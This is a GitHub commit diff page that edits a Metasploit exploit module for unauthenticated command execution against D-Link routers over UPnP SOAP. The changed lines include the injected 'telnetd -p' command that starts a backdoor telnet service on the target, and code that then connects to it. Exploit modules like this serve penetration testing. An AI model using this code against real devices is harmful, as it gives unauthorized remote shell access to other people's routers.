Skip to content

Commit a6b48f3

Browse files
author
m-1-k-3
committed
HTTP GET
1 parent 9f65264 commit a6b48f3

File tree

1 file changed

+8
-8
lines changed

1 file changed

+8
-8
lines changed

modules/exploits/linux/http/dlink_upnp_exec_noauth.rb

Lines changed: 8 additions & 8 deletions
Original file line numberDiff line numberDiff line change
@@ -124,15 +124,15 @@ def request(cmd, type, new_external_port, new_internal_port, new_portmapping_des
124124
data_cmd << "</SOAP-ENV:Envelope>"
125125

126126
begin
127-
res = send_request_raw({
128-
'uri' => uri << data_uri,
129-
#'vars_get' => {
130-
# 'service' => 'WANIPConn1'
131-
#},
127+
res = send_request_cgi({
128+
'uri' => uri,
129+
'vars_get' => {
130+
'service' => 'WANIPConn1'
131+
},
132+
'ctype' => "text/xml",
132133
'method' => 'POST',
133134
'headers' => {
134135
'SOAPAction' => soapaction,
135-
'Content-Type' => "text/xml"
136136
},
137137
'data' => data_cmd
138138
})
@@ -179,7 +179,7 @@ def exploit
179179
vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")
180180

181181
#cmd = "telnetd -p #{telnetport} -l \"/usr/sbin/login\" -u #{user}:#{passw}"
182-
cmd = "telnetd -p #{telnetport}" # -l \"/usr/sbin/login\" -u #{user}:#{passw}"
182+
cmd = "telnetd -p #{telnetport}"
183183
type = "add"
184184
res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description)
185185
if (!res or res.code != 200)
@@ -200,7 +200,7 @@ def exploit
200200
print_error("#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
201201
end
202202

203-
print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}" # with #{user}:#{passw}"
203+
print_status "Attempting to start a Telnet session #{rhost}:#{telnetport}"
204204
auth_info = {
205205
:host => rhost,
206206
:port => telnetport,

0 commit comments

Comments
 (0)